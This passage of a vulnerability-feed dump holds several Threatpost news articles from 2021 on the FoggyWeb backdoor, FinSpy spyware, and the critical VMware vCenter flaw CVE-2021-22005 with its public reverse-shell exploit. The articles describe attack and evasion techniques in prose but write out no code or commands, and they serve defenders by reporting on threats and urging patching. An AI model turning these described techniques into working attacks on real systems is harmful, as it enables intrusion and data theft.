deal.\n\n\u201cMy bet is the seller doesn\u2019t get anywhere close to their $100,000 asking price. It\u2019s not a scarce resource,\u201d Grimes said in an email to Threatpost.\n\nHe also noted that while he agrees the data could fuel future smishing and other socially engineered attacks, he doesn\u2019t suspect much pushback from users.\n\n\u201cI think most people simply see this as a cost of using free internet services, Clubhouse or any other service,\u201d he said.\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. _[_JOIN_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[_4 Golden Rules of Linux Security_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[_REGISTER NOW_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-27T14:59:58", "type": "threatpost", "title": "3.8 Billion Users\u2019 Combined Clubhouse, Facebook Data Up for Sale", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T14:59:58", "id": "THREATPOST:5E56D9C77DAD674F8B21F56E904893D4", "href": "https://threatpost.com/clubhouse-facebook-data-sale/175023/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-29T14:13:43", "description": "The threat actors behind the notorious SolarWinds supply-chain attacks have dispatched new malware to steal data and maintain persistence on victims\u2019 networks, researchers have found.\n\nResearchers from the Microsoft Threat Intelligence Center (MSTIC) have observed the APT it calls Nobelium using a post-exploitation backdoor dubbed FoggyWeb, to attack Active Directory Federation Services (AD FS) servers. AD FS enables single sign-on (SSO) across cloud-based apps in a Microsoft environment, by sharing digital identity and entitlements rights.\n\nThe attacks started as far back as April, Ramin Nafisi from MSTIC wrote in a [blog post](<https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/>) published Monday.\n\nNobelium is employing \u201cmultiple tactics to pursue credential theft\u201d to gain admin privileges to AD FS servers, Nafisi wrote. Then, once a server is compromised, the threat group deploys FoggyWeb \u201cto remotely exfiltrate the configuration database of compromised AD FS servers, decrypted [token-signing certificates](<https://docs.microsoft.com/windows-server/identity/ad-fs/design/token-signing-certificates>) and [token-decryption certificates](<https://docs.microsoft.com/windows-server/identity/ad-fs/design/certificate-requirements-for-federation-servers>),\u201d he said, which can be used to penetrate into users\u2019 cloud accounts.\n\nIn addition to remotely exfiltrating sensitive data, FoggyWeb also achieves persistence and communicates with a a command-and-control (C2) server to receive additional malicious components and execute them, Nafisi added.\n\n## **Backdoor Breakdown**\n\nNafisi provides a thorough breakdown of the sophisticated FoggyWeb backdoor, which operates by allowing abuse of the Security Assertion Markup Language (SAML) token in AD FS, he explained in the post.\n\n\u201cThe backdoor configures HTTP listeners for actor-defined URIs that mimic the structure of the legitimate URIs used by the target\u2019s AD FS deployment,\u201d Nafisi wrote. \u201cThe custom listeners passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor.\u201d\n\nAttackers store the malware in an encrypted file called _Windows.Data.TimeZones.zh-PH.pri_, while the malicious file _version.dll_ acts as a loader. The DLL file leverages the CLR hosting interfaces and APIs to load FoggyWeb, a managed DLL, in the same Application Domain within which legitimate AD FS managed code is executed.\n\nIn this way, FoggyWeb gains access to the AD FS codebase and resources, including the AD FS configuration database. The malware also inherits AD FS service account permissions that are required to access the AD FS configuration database, Nafisis wrote.\n\nAdditionally, \u201cbecause FoggyWeb is loaded into the same application domain as the AD FS managed code, it gains programmatical access to the legitimate AD FS classes, methods, properties, fields, objects and components that are subsequently leveraged by FoggyWeb to facilitate its malicious operations,\u201d he added.\n\nMoreover, FoggyWeb is also AD FS version-agnostic, which means it doesn\u2019t need to keep track of legacy versus modern configuration table names and schemas, named pipe names and other version-dependent properties of AD FS, Nafisi wrote.\n\n## **Malware Mitigation**\n\nMicrosoft has notified all customers observed being targeted or compromised by FoggyWeb, as well as included a comprehensive list of compromise indicators in the post.\n\nThe company also has recommended several mitigation actions for organizations, including: Auditing of on-premises and cloud infrastructure to identify any changes the actor might have made to maintain access; removing user and app access, reviewing configurations for each, and re-issuing new, strong credentials; and using a hardware security module to prevent the exfiltration of sensitive data.\n\nMicrosoft also is advising that all customers review their AD FS Server configuration and implement whatever changes are needed to secure the systems from attacks.\n\n## **Tracking a Known Threat Actor**\n\nMicrosoft researchers have been keeping a wary eye on Nobelium since the company [got caught up](<https://threatpost.com/microsoft-solarwinds-spy-attack-federal-agencies/162414/>) in the [SolarWinds attack](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) that was first discovered late last year. They\u2019ve been tracking the threat group\u2019s activity and capabilities, which have expanded as the actors have built and deployed new malware.\n\nSince [the SolarWinds incident](<https://threatpost.com/dhs-sophisticated-cyberattack-foreign-adversaries/162242/>), researchers have observed Nobelium steadily building out its arsenal beyond the Sunburst/Solorigate backdoor and Teardrop malware it initially deployed in that attack, which reached tens of thousands of organizations around the globe (though fewer than 100 were selected by the attackers for actual breach and compromise).\n\nThe group used malware called [Raindrop](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) in those follow-on SolarWinds attacks, then later added [GoldMax, GoldFinder and Sibot](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) malware for layered persistence to its toolset.\n\nMicrosoft researchers also identified EnvyScout, BoomBox, NativeZone and VaporRage as four pieces of malware that were used in a Nobelium [email-based attack chain](<https://threatpost.com/solarwinds-nobelium-phishing-attack-usaid/166531/>) earlier this year.\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. _[**_JOIN_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[**_4 Golden Rules of Linux Security_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[**_REGISTER NOW_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-28T14:39:49", "type": "threatpost", "title": "SolarWinds Attackers Hit Active Directory Servers with FoggyWeb Backdoor", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T14:39:49", "id": "THREATPOST:CD203B10BCB138850F42815F74C8A5AF", "href": "https://threatpost.com/solarwinds-active-directory-servers-foggyweb-backdoor/175056/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T22:44:05", "description": "The FinSpy surveillance kit has been driven from its hiding place following an eight-month investigation by Kaspersky researchers. Detections of the spyware trojan have dwindled since 2018, but it turns out that it hasn\u2019t gone away \u2013 it\u2019s simply been hiding behind various first-stage implants that have helped to cloak its activities. At the same time, it\u2019s continued to advance its capabilities.\n\nFinSpy (aka FinFisher or Wingbird) is a multiplatform software for Windows, macOS and Linux that\u2019s marketed as a tool for law enforcement. However, much like [NSO Group\u2019s Pegasus](<https://threatpost.com/pegasus-spyware-uses-iphone-zero-click-imessage-zero-day/168899/>), it\u2019s often seen [being used for far more malicious purposes](<https://threatpost.com/finspy-modules-secure-messaging-apps/146372/>). First discovered in 2011, it\u2019s a full-service spyware, capable of stealing information and credentials as well as keeping tabs on user activities. For instance, it gathers file listings and deleted files, as well as various documents; can livestream or record data via webcam and microphone; can snoop on messaging chats; and it uses the developers\u2019 mode in browsers to intercept traffic protected with an HTTPS protocol. [![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nIn the middle of 2019, several suspicious installers for legitimate applications such as TeamViewer, VLC Media Player and WinRAR were found to contain malicious code. However, they didn\u2019t seem connected to any known malware, according to Kaspersky. But one day researchers stumbled across a Burmese-language website that hosted both the trojanized installers as well as samples of FinSpy for Android.\n\n\u201cWe began detecting some suspicious installers of legitimate applications, backdoored with a relatively small, obfuscated downloader,\u201d according to Kaspersky researchers Igor Kuznetsov and Georgy Kucherin, presenting at a retro-themed and virtual Security Analyst Summit (SAS) 2021 on Tuesday. \u201cOver the course of our investigation, we found out that the backdoored installers are nothing more than first-stage implants that are used to download and deploy further payloads before the actual FinSpy trojan.\u201d\n\n## **Multiple Evasion Techniques**\n\nThe new samples are protected with multiple layers of evasion tactics. For one, after a victim downloads and executes a trojanized application, they\u2019re vetted by two components, according to the analysis. The first is a \u201cpre-validator\u201d that runs multiple security checks to ensure that the device it is infecting does not belong to a security researcher.\n\nThe pre-validator downloads a host of security shellcodes from the command-and-control (C2) server and executes them \u2013 33 of them in all. Each shellcode collects specific system information (e.g., the current process name) and uploads it back to the server, researchers noted. If any of the checks fail, the command-and-control (C2) server terminates the infection process.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28125042/SAS-2-1024x527.png)\n\nKaspersky researchers Georgy Kucherin and Igor Kuznetsov and, presenting at the virtual Security Analyst Summit (SAS) 2021.\n\nIf all security checks pass, the server provides a second component, dubbed the \u201cpost-validator.\u201d It collects information that allows it to identify the victim machine and perhaps validate a specific target (it logs running processes, recently opened documents and screenshots) and sends it to a C2 server specified in its configuration.\n\nBased on the information collected, the C2 server decides whether to deploy the full-fledged trojan platform or remove the infection, according to Kaspersky.\n\nIf FinSpy is finally deployed, it arrives heavily obfuscated with four complex, custom-made obfuscators, according to Kaspersky\u2019s analysis.\n\n\u201cThe primary function of this obfuscation is to slow down the analysis of the spyware,\u201d the researchers explained.\n\nAnother evasion tactic involves a sample of FinSpy that infects machines by replacing the Windows UEFI bootloader, which is responsible for launching the operating system.\n\n\u201cThis method of infection allowed the attackers to install a bootkit without the need to bypass firmware security checks,\u201d according to [the research](<https://securelist.com/finspy-unseen-findings/104322/>). \u201cUEFI infections are very rare and generally hard to execute, they stand out due to their evasiveness and persistence. While in this case the attackers did not infect the UEFI firmware itself, but its next boot stage, the attack was particularly stealthy, as the malicious module was installed on a separate partition and could control the boot process of the infected machine.\u201d\n\nThe amount of work put into making FinSpy inaccessible to security researchers is particularly worrying, if impressive, said Kuznetsov. \u201cIt seems like the developers put at least as much work into obfuscation and anti-analysis measures as in the trojan itself,\u201d he noted. \u201cThe fact that this spyware is deployed with high precision and is practically impossible to analyze also means that its victims are especially vulnerable, and researchers face a special challenge \u2013 having to invest an overwhelming amount of resources into untangling each and every sample.\u201d\n\n## **Highly Modular FinSpy**\n\nKaspersky also looked into the capabilities of the latest samples to see if there have been advancements and found that FinSpy\u2019s architecture remains highly modular, but more difficult to analyze than ever. That\u2019s because a component called \u201cthe hider\u201d encrypts all of them.\n\n\u201cIt encrypts all of the memory pages, belonging to the whole infrastructure, including the orchestrator and all of the plugins, and all the memory pages will just stay encrypted until they are needed,\u201d explained Kuznetsov. \u201cThe moment the code has to be executed or data has to be accessed, that one page is decrypted. Then when it is no longer needed, it\u2019s just encrypted back.\u201d\n\nHe added, \u201cThis means that if you even make a live memory image of an infected machine it will be very hard to find the trojan in memory, because the only unencrypted thing that you will see, will be a tiny part of this hider.\u201d\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28124956/finspy-1024x492.png)\n\nSource: Kaspersky.\n\nThe hider is also responsible for starting \u201cthe orchestrator,\u201d which is a core module that will load the rest of the functionality and control the plugins, according to the analysis. It remains more or less the same as it was in previous samples, Kuznetsov said, but it adds a new module called \u201cthe communicator,\u201d which is a hard-coded binary within a resource section of the orchestrator used to maintain C2 communication.\n\nAnother new module is a process worm.\n\n\u201cThis doesn\u2019t infect or propagate between the machines. Instead, it propagates within the machine, starting from the top process where the whole architecture started (usually explorer.exe or Winlogon.exe),\u201d explained Kuznetsov. \u201cIt will make copies of itself in all the child processes, and all these child processes infected will maintain communication with the parent process.\u201d\n\nThis worm module also hooks the keyboard, mouse clicks and various APIs to FinSpy\u2019s various plugins, for data-collection purposes.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28124846/Finspy-plugin.png)\n\nSource: Kaspersky.\n\n\u201cThe plugins themselves are used mostly to collect information about the victim,\u201d he said. \u201cThere are not many plugins devoted to other tasks. We haven\u2019t found any plugins devoted to lateral movement for example, though there is one curious plugin that is devoted to infecting BlackBerry devices.\u201d\n\nThere are individual plugins for stealing credentials for VPNs, dial-up credentials, Microsoft product key information, browser search and browsing history, information about Wi-Fi connections, file listings, and more. There\u2019s also a generic plugin for recording audio from any voice over IP (VoIP) software.\n\n\u201cWhat is also interesting is that there are forensic tools for uncovering information about deleted files and storing that deleted-file history,\u201d Kuznetsov said. \u201cThere is also quite a unique plugin that exploits the debug function of modern browsers. By setting a particular environment variable, they make the browsers dump all the SSL encryption keys on disk. And by doing this, the attackers can decrypt all the SSL traffic from the victim.\u201d\n\nAll of the information can be collected in real time and can be live-streamed to the attackers or pre-recorded. Data collection can be triggered by launching an application of interest as well, the researcher noted.\n\nOne thing is clear: FinSpy remains under active development, and its authors have put a herculean effort into avoiding analysis.\n\n\u201cWe spent about eight months full time, with several researchers,\u201d Kuznetsov said. \u201cDuring that time we really had to upgrade all our tooling. We had to invent and make some tools from scratch, all of which led to producing a 300-page report on this. And what is the conclusion here? We think that there is no conclusion, because we believe that this story is never-ending. They will keep updating and upgrading their infrastructure, all the time.\u201d\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. _[**_JOIN_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[**_4 Golden Rules of Linux Security_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[**_REGISTER NOW_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-28T17:45:59", "type": "threatpost", "title": "SAS 2021: FinSpy Surveillance Kit Re-Emerges Stronger Than Ever", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T17:45:59", "id": "THREATPOST:88FF52A5E5D2048EB3D0F046F6D96C9F", "href": "https://threatpost.com/finspy-surveillance-kit/175068/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-22T16:20:45", "description": "VMware has released a [security update](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) that includes patches for 19 CVE-numbered vulnerabilities that affect the company\u2019s vCenter Server virtualization management platform and its hybrid Cloud Foundation platform for managing VMs and orchestrating containers.\n\nThey\u2019re all serious, but one \u2013 CVE-2021-22005, a critical arbitrary file upload vulnerability in the Analytics service that\u2019s been assigned the maximum CVSSv3 base score of 9.8 \u2013 is uber nasty.\n\n\u201cThis vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,\u201d [said Bob Plankers](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>), Technical Marketing Architect at VMware.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe time to act is yesterday, Plankers wrote:\n\n> \u201cIn this era of ransomware it is safest to assume that an attacker is already inside your network somewhere, on a desktop and perhaps even in control of a user account, which is why we strongly recommend declaring an emergency change and patching as soon as possible.\u201d \u2014Bob Planker, [VMware vSphere blog](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>)\n\nThe security update addresses flaws in vCenter Server 6.5, 6.7, and 7.0.\n\n## When to Act?\n\nThe time to act is \u201cRight now,\u201d Plankers said. \u201cThese updates fix a critical security vulnerability, and your response needs to be considered at once.\u201d\n\nCVE-2021-22005 can be used to execute commands and executables on the vCenter Server Appliance. The company didn\u2019t tiptoe around the need for urgent action: Users should patch this vulnerability \u201cimmediately,\u201d VMware said in its [FAQ for VMSA-2021-0020](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>). The bug could have nasty repercussions, with exploits likely being hammered out \u201cminutes after the disclosure,\u201d it said:\n\n> \u201cThe ramifications of this vulnerability are serious and it is a matter of time \u2013 likely minutes after the disclosure \u2013 before working exploits are publicly available.\u201d [\u2014VMware FAQ](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>)\n\n## Assume That Attackers Are Already In Your System\n\nThis is a ransomware-friendly bug. VMware pointed to the [all-too-real threat](<https://threatpost.com/ransomware-volumes-record-highs-2021/168327/>) of spiraling ransomware attacks: a growing risk that makes the \u201csafest stance\u201d the assumption that threat actors have already seized control of a desktop and a user account via [phishing](<https://threatpost.com/hackers-deep-sea-phishing/174868/>) or [spearphishing](<https://threatpost.com/linkedin-spear-phishing-job-hunters/165240/>) attacks, it said.\n\nIf a phishing attack has compromised an account(s), it means that the attacker \u201cmay already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence,\u201d VMware stressed.\n\nThis patch is considered an \u201cemergency change\u201d for organizations that practice change management using the [ITIL definitions](<https://wiki.en.it-processmaps.com/index.php/Change_Management>) of change types, the company said. An emergency change is one that must be introduced ASAP: for example, to resolve a major incident or implement a security patch.\n\nGranted, the decision on how to proceed is up to individual organizations, all of which have different environments, tolerance for risk, security controls and risk mitigation strategies. \u201cThe decision on how to proceed is up to you,\u201d VMware said, but still, given the severity, the company strongly recommends that users act.\n\n## The Other 18 Flaws Are Still Attacker Candy\n\nThe other security issues addressed in Tuesday\u2019s update have lower CVSS scores, but they\u2019re still ripe for the plucking by any attacker that\u2019s already compromised organizations\u2019 networks. That\u2019s one of the \u201cbiggest problems facing IT today,\u201d Plankers wrote: the fact that cyberattackers can persist on a compromised network, \u201cpatiently and quietly\u201d biding their time to eventually move laterally as they use compromised accounts to break into other systems over long periods of time.\n\n\u201cThey steal confidential data, intellectual property, and at the end install ransomware and extort payments from their victims,\u201d Plankers explained. \u201cLess urgent security vulnerabilities can still be potential tools in the hands of attackers, so VMware always recommends patching to remove them.\u201d\n\n## How to CYA (Cover Your Assets)?\n\nIf possible, the quickest way to resolve these serious issues is to patch vCenter Server. If that\u2019s not possible, VMware has workarounds, but only for the critical vulnerability, CVE-2021-22005. The workaround is listed in the [response matrix](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) at the bottom of VMware\u2019s VMware Security Advisory (VMSA), VMSA-2021-0020.\n\nThe workaround involves editing a text file on the VCSA and restarting services.\n\nStill, if possible, patching should be the first choice for a few reasons, Plankers advised:\n\n> First, if you can patch vCenter Server, do it. In general, this is the fastest way to resolve this problem, doesn\u2019t involve editing files on the vCenter Server Appliance (VCSA), and removes the vulnerabilities completely. Patching also carries less technical debt and less risk than using a workaround. \u2014Bob Plankers\n\nOther security controls that can help to protect users\u2019 networks until they can patch include using network perimeter access controls or the vCenter Server Appliance firewall to curtail access to the vCenter Server management interfaces. \u201cWe always strongly suggest limiting access to vCenter Server, ESXi, and vSphere management interfaces to only vSphere Admins,\u201d Plankers said. \u201cDrive all other workload management activity through the VM network connections. This simplifies access control and makes the RDP or ssh management traffic subject to other security controls, such as IDS/IPS and monitoring.\u201d\n\n## More Resources\n\nVMware offered this list of resources:\n\n * [Tips for Patching VMware vSphere](<https://core.vmware.com/tips-patching-vmware-vsphere>) (practical advice for ensuring patching success)\n * [VMware vSphere Security Configuration Guide](<https://core.vmware.com/security-configuration-guide>) (baseline security best practices for vSphere)\n * [VMware Ransomware Resource Center](<https://core.vmware.com/ransomware>) (discussion around tactics to help prevent, deter, and recover from attacks)\n * [VMware Ports & Protocols Firewalling Guidance](<https://ports.vmware.com/>) (ports.vmware.com)\n * [VMware Security Advisory VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) (descriptions of the issues and workarounds)\n * [VMware Communities Forum Thread on VMSA-2021-0020](<https://via.vmw.com/vmsa-2021-0020-community>) (a great place to ask questions)\n * [VMSA-2021-0020: Questions & Answers](<https://via.vmw.com/vmsa-2021-0020-faq>) (questions VMware has received about this issue)\n * [VMSA-2021-0020: What You Need to Know](<https://via.vmw.com/vmsa-2021-0020-blog>) (Plankers\u2019 blog post)\n\n## Can\u2019t Patch What You Don\u2019t Know Is There\n\nGreg Fitzgerald, co-founder of the cybersecurity firm Sevco Security, noted that vulnerabilities such as this one point to the need to go far beyond patching this vCenter bug. \u201cIt\u2019s critical for enterprises to take the first step of patching this vCenter vulnerability, but it can\u2019t stop there,\u201d he told Threatpost on Wednesday.\n\nBeyond patching the initial vulnerability ASAP, enterprises would be well-advised to know what IT assets they have. Even the most fastidious approach to patch management \u201ccannot ensure that all enterprise assets are accounted for,\u201d he said via email. \u201cYou can\u2019t patch something if you don\u2019t know it\u2019s there, and attackers have figured out that the easiest path to accessing your network and your data is often through unknown or abandoned IT assets.\u201d\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-22T16:17:33", "type": "threatpost", "title": "VMware Warns of Ransomware-Friendly Bug in vCenter Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T16:17:33", "id": "THREATPOST:14DD6B793DC77F25538436F7D14C922B", "href": "https://threatpost.com/vmware-ransomware-bug-vcenter-server/174901/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-28T22:42:30", "description": "A fully working exploit for the critical CVE-2021-22005 remote code-execution (RCE) vulnerability in VMware vCenter is now public and being exploited in the wild.\n\nReleased on Monday by Rapid7 security engineer William Vu (who goes by the Twitter handle [wvu](<https://twitter.com/wvuuuuuuuuuuuuu>)), this one\u2019s different from the incomplete proof-of-concept (PoC) exploit that began making the rounds on Friday. This variant can be used to open a reverse shell on a vulnerable server, allowing remote attackers to execute arbitrary code.\n\nThe vulnerability can be exploited by unauthenticated, remote users and allows attackers to upload a file to the vCenter Server analytics service.\n\n## UPDATE: Indicators of Exploit\n\nUPDATE: 092821 16:21 The attack team at the attack surface management firm Randori also has a working RCE exploit for CVE-2021-22005. Zero-day finder Aaron Portnoy detailed the exploit in his [attack notes](<https://www.randori.com/blog/technical-analysis-vcenter-vmsa-2021-0020/>), which also include detection methods and indicators of exploit that defenders can use to determine whether or not they\u2019ve been exploited by this bug.\n\nRandori confirmed what VMware, CISA and everybody else is saying: Namely, that these vulnerabilities \u201care very serious issues,\u201d and that affected organizations \u201cshould take immediate action to ensure the security of impacted devices.\u201d As it is, Portnoy said, CISA has predicted a high likelihood that foreign actors will move quickly to exploit the vulnerability.\n\nPortnoy also reiterated what VMware has already stressed: To wit, users should just assume that they\u2019re already infected. \u201cOrganizations that have or had affected vCenter versions exposed to the Internet, since the vulnerability was made public on September 21, should assume that an adversary may have gained access to their network and review historical logs for anomalous behavior, such as abnormal usernames or source IP connections, and signs of compromise,\u201d he wrote.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nBelow is Vu\u2019s unredacted RCE proof-of-concept exploit against endpoints in servers that have the Customer Experience Improvement Program (CEIP) component enabled. Through [CEIP](<https://www.vmware.com/solutions/trustvmware/ceip.html>), VMware collects technical information about customers\u2019 use of its products. The CEIP is toggled [on as a default](<https://docs.vmware.com/en/VMware-Cloud-Foundation/4.0/com.vmware.vcf.vxrail.admin.doc/GUID-2B70F601-7D01-4609-AB1A-870A20485B67.html#:~:text=The%20Join%20the%20VMware%20Customer,Click%20Apply.>) setting in VMware Cloud Foundation.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28100106/Unredacted-RCE-PoC-against-CEIP-e1632837685764.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28100106/Unredacted-RCE-PoC-against-CEIP-e1632837685764.png>)\n\nUnredacted RCE PoC against VMware\u2019s CEIP. Source: [wvu](<https://twitter.com/wvuuuuuuuuuuuuu/status/1442634215330390020/photo/1>).\n\nNot that configurations matter with this vulnerability, VMware said last week. \u201cThis vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,\u201d said Bob Plankers, technical marketing architect at VMware, when VMware [announced](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>) the vulnerability on Tuesday.\n\nCERT/CC vulnerability analyst [Will Dormann](<https://twitter.com/wdormann>) noted that a redacted PoC that Vu listed at the start of a thread that began on Friday didn\u2019t require CEIP to be enabled. \u201cUnclear if THAT one is being used in the wild now,\u201d Dormann said.\n\nAccording to Vu\u2019s [technical analysis](<https://www.bleepingcomputer.com/news/security/working-exploit-released-for-vmware-vcenter-cve-2021-22005-bug/>), the full, unredacted PoC starts with a request to create a directory for path traversal and schedules the spawn of a reverse shell.\n\n## History of a Bad Bug\n\n[VMware announced](<https://threatpost.com/vmware-ransomware-bug-vcenter-server/174901/>) CVE-2021-22005 a week ago, on Sept. 21, as part of a [security update](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) that included patches for 19 CVE-numbered vulnerabilities that affect the company\u2019s vCenter Server virtualization management platform and its hybrid Cloud Foundation platform for managing VMs and orchestrating containers.\n\nThey were all serious, but CVE-2021-22005 \u2013 a critical arbitrary file upload vulnerability in the Analytics service \u2013 was assigned a CVSSv3 base score of 9.8 out of a maximum severity rating of 10. VMware urged users to declare an \u201cemergency change\u201d per [ITIL definitions](<https://wiki.en.it-processmaps.com/index.php/Change_Management>) of change types and to patch as soon as possible.\n\nAlso, on Friday, the Cybersecurity and Infrastructure Security Agency [(CISA) warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>) that VMware had confirmed that threat actors were exploiting the bug and that security researchers were reporting mass scanning for vulnerable vCenter servers and publicly available exploit code. CISA urged users with vulnerable systems to prioritize updating or to apply VMware\u2019s [workaround](<https://kb.vmware.com/s/article/85717>).\n\n\u201cDue to the availability of exploit code, CISA expects widespread exploitation of this vulnerability,\u201d the advisory stated.\n\n## Know What Assets Need to Be Patched\n\nIn addition to prioritizing patching, it\u2019s important to know about all the assets that need to be patched, according to Greg Fitzgerald, co-founder of the cybersecurity firm Sevco Security.\n\n\u201cWe\u2019ve found that the vast majority of enterprises have robust patch management tools that are extremely effective at what they\u2019re designed to do: Applying patches to assets that security and IT teams know about,\u201d he told Threatpost via email on Tuesday.\n\nHe continued: \u201cCompanies are not getting breached because their patch management tools aren\u2019t good enough. They\u2019re getting breached because it\u2019s impossible to patch an asset you don\u2019t know is there in the first place. Maintaining an accurate IT asset inventory in a dynamic environment is really hard to do. Threat actors figured that out a long time ago and work around the clock to exploit it. The first step to combating threats like this one is to establish a continuously updated, accurate inventory of all enterprise assets to serve as a foundational control for your security program.\u201d\n\n_**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER 